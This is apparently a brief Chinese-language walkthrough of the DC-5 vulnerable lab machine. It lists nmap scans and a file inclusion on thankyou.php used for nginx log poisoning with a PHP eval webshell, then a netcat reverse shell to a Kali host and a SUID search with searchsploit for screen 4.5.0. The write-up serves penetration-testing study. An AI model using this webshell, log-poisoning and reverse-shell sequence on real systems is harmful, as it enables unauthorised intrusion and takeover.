信息收集
端口和网段信息:使用nmap扫描
//扫描网段中存货的主机
nmap -sP 192.168.10.0/24
//进行对主机进行猜测-》发现接口:80存活
nmap -sV 192.168.10.245
目录信息 :使用dirbuster
指纹信息
找漏洞
发现web 中contact有提交界面进行尝试
发现页脚时间随着刷新变化,可能有文件包含漏洞
猜测传参的key为’file‘
注入一句话木马:
<?php eval($_POST['pass']);?>
使用工具进行连接
http://192.168.10.145/thankyou.php?file=/var/log/nginx/error.log
/var/log/nginx/error.log 为nginx报错日志路径
使用nc连接kali
kali中运行,持续监听1234端口
nc -lvvp 1234
在连接靶机的工具中使用,连接kali
nc -e /bin/bash 192.168.10.223 1234
查找dc-5中的特殊文件
find / -perm -u=s -type f 2>/dev/null
查找对应插件payload进行提权
searchsploit scree 4.5.0